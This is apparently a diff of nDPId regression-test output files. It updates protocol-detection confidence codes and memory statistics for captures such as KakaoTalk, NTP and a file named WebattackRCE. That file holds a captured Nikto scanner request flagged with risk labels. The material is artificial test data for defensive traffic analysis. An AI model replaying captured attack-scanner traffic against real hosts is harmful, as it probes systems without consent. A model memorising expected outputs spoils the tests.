-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":3203,"packets-processed":3203,"total-skipped-flows":0,"total-l4-payload-len":291404,"total-not-detected-flows":0,"total-guessed-flows":9,"total-detected-flows":11,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":115,"global_ts_msec":1430069216559} @@ -121,9 +121,9 @@ ~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6009613 bytes -~~ total memory freed........: 6009613 bytes -~~ total allocations/frees...: 121420/121420 +~~ total memory allocated....: 6143247 bytes +~~ total memory freed........: 6143247 bytes +~~ total allocations/frees...: 124182/124182 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 1502 chars diff --git a/test/results/NTPv2.pcap.out b/test/results/NTPv2.pcap.out index c2b7a6aa5..4b8708c1f 100644 --- a/test/results/NTPv2.pcap.out +++ b/test/results/NTPv2.pcap.out 
@@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865383632} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865383632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1436865383632,"pkt":"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"} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":42,"version":42}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": 
{"request_code":42,"version":42}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":368,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865383632} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 929 chars diff --git a/test/results/NTPv3.pcap.out b/test/results/NTPv3.pcap.out index 9c0f9b70a..cfa566c2b 100644 
--- a/test/results/NTPv3.pcap.out +++ b/test/results/NTPv3.pcap.out 
@@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865405371} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865405371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1436865405371,"pkt":"RIpbLCrSACaIdf8bCABFAABMAABAADcRbcOvkIwdTi5MAgB7AFAAOLcYHAAE+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZT08RAAAAANlPTxEAAAAA"} 
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": 
{"request_code":0,"version":0}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865405371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 673 chars diff --git a/test/results/NTPv4.pcap.out b/test/results/NTPv4.pcap.out index 300e0f594..f826deeec 100644 
--- a/test/results/NTPv4.pcap.out +++ b/test/results/NTPv4.pcap.out 
@@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865396190} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865396190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1436865396190,"pkt":"RIpb2HMEACaIdf8bCABFAABMrX9AADcRaFpVFj54Ti5MCwB7AHsAOKmfIwIH6wAABFAAAAOrg7wD39lPUcMxZbhg2URXVTAzb9DZRFdVMbTpeNlPUfQtJuL0"} 
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": 
{"request_code":0,"version":0}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865396190} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 673 chars diff --git a/test/results/Oscar.pcap.out b/test/results/Oscar.pcap.out index dbda01d60..8244d0241 100644 
--- a/test/results/Oscar.pcap.out +++ b/test/results/Oscar.pcap.out @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5904384 bytes -~~ total memory freed........: 5904384 bytes -~~ total allocations/frees...: 118196/118196 +~~ total memory allocated....: 6007184 bytes +~~ total memory freed........: 6007184 bytes +~~ total allocations/frees...: 120948/120948 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 683 chars diff --git a/test/results/WebattackRCE.pcap.out b/test/results/WebattackRCE.pcap.out index 76a0dd0f7..fccd1646e 100644 --- a/test/results/WebattackRCE.pcap.out +++ b/test/results/WebattackRCE.pcap.out 
@@ -2,2395 +2,2395 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1576420276577} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} +01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 